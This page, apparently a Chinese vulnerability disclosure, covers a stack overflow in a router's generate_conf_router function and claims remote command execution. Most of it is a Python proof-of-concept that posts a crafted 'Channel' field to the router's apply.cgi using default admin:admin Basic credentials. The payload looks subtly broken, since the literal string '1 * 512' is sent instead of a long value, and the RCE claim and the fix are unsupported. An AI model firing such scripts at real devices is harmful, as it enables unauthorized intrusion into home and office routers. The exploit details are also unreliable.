路由器generate_conf_router函数栈溢出漏洞及RCE POC

### 漏洞概述 该漏洞涉及 `generate_conf_router` 函数中的栈溢出问题，可能导致任意命令执行。具体来说，`Channel` 变量通过 `nvram_get` 函数从 `Web_URL` 获取，并在 `generate_conf_router` 函数中被使用，导致栈溢出。 ### 影响范围 - **受影响组件**：`generate_conf_router` 函数 - **潜在风险**：任意命令执行 ### 修复方案 - **移除不必要的行**：在 `generate_conf_router` 函数中移除不必要的行，以防止栈溢出。 ### POC 代码 ```python #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ AP Client - Channel Injection """ import requests import json from urllib.parse import urlencode requests.packages.urllib3.disable_warnings() request = { "name": "AP Client - Channel Injection", "method": "POST", "url": "http://192.168.10.1/apply.cgi", "referer": "http://192.168.10.1/apclient_scan.asp", "headers": { "Cache-Control": "max-age=0", "Authorization": "Basic YWRtaW46YWRtaW4=", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data": { "submit_button": "apclient_scan", "change_action": "", "wan_proto": "9", "action": "Apply", "wan_dns_enable": "1", "ApCliEnable": "1", "ApCliBssid": "", "Channel": "1 * 512", "ApCliBridgeEnable": "1", "ApClientBridgeEnable": "on", "ApCliSsid": "Remote_AP_SSID", "ApCliAutoMode": "OPEN", "ApCliEncryptType": "NONE", "ApCli_wl_wep_len": "0", "ApCliDefaultKeyID": "1", "ApCliKeyType": "0", "ApCliKey1Str": "************", "ApCliKey2Type": "0", "ApCliKey2Str": "************", "ApCliKey3Type": "0", "ApCliKey3Str": "************", "ApCliKey4Type": "0", "ApCliKey4Str": "************", "ApCliWPAEncrType": "TKIP", "ApCliWPAKey": "12345678" } } def send_request(): """发送HTTP POST请求""" try: headers = request["headers"].copy() headers["Origin"] = "http://192.168.10.1" headers["Referer"] = request["referer"] print(f"[+] 发送请求: {request['name']}") print(f"[+] URL: {request['url']}") print(f"[+] Referer: {request['referer']}") print(f"[+] 数据长度: {sum(len(str(v)) for v in request['data'].values())} bytes\n") response = requests.post( request["url"], data=request["data"], headers=headers, timeout=10, verify=False ) print(f"[+] 状态码: {response.status_code}") print(f"[+] 响应长度: {len(response.text)} bytes") print(f"[+] 响应头: {dict(response.headers)}\n") return response except Exception as e: print(f"[-] 错误: {e}\n") return None if __name__ == "__main__": send_request() ```

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

路由器generate_conf_router函数栈溢出漏洞及RCE POC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

路由器generate_conf_router函数栈溢出漏洞及RCE POC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！